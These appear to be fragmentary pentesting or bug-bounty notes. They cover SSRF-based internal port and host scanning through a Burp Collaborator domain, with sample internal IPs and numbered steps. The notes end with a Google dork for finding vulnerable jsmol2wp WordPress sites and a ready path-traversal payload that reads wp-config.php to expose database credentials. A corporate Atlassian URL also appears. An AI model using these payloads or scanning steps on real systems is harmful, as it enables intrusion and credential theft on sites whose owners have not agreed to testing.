4qvg8ekw240pammv8ekhjmtwhnndb2.burpcollaborator.net:80 = HTTP scanned

4qvg8ekw240pammv8ekhjmtwhnndb2.burpcollaborator.net:21/test.html = closed

4qvg8ekw240pammv8ekhjmtwhnndb2.burpcollaborator.net:443/test.html = HTTP and DNS = Open

4qvg8ekw240pammv8ekhjmtwhnndb2.burpcollaborator.net:1 - 200 PORTS


SSRF - IP

123.23.45.1
123.23.45.2
123.23.45.3
123.23.45.4
123.23.45.255


Steps:
1. Burp link inserted + burp.net:1-65535 
2. Get HTTP request = IP
3. Copied IP = Exchanged with burp.net
4. Used https://52.23.251.1-255
5. 52.23.251.1-255
6. Multiple host with diff length = 870 to 985
7. IP 
819 , 820, 821

Impact
1. Scanned backend HOST 
2. Able guess for up and down machine
3. Accessible IP = Information
4. 



65535 PORTS we can scan

10000 Ports basic Open
55535 Ports basic closed , filtered , wrapped , DNS based

SSRF 


On open ports : Response
Closed : Nothing
DNS    : 


Dos




.atlassian.net/servicedesk/customer/user/signup
https://tesla.atlassian.net/issues/?jql=teststs


https://jialuyu.com

inurl:"/wp-content/plugins/jsmol2wp/php/"
jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-theme.php